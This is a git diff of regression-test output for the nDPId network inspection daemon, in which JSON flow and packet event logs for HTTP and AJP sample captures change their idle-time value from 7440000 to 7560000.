+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":139,"packets-processed":133,"total-skipped-flows":0,"total-l4-data-len":79130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1614860229390} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 139/133 diff --git a/test/results/ajp.pcap.out b/test/results/ajp.pcap.out index caf8b7e52..157f9eb8b 100644 --- a/test/results/ajp.pcap.out +++ b/test/results/ajp.pcap.out @@ -1,12 +1,12 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ajp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1505154584447} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447} @@ -17,13 +17,13 @@ 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584448} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} @@ -34,8 +34,8 @@ 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 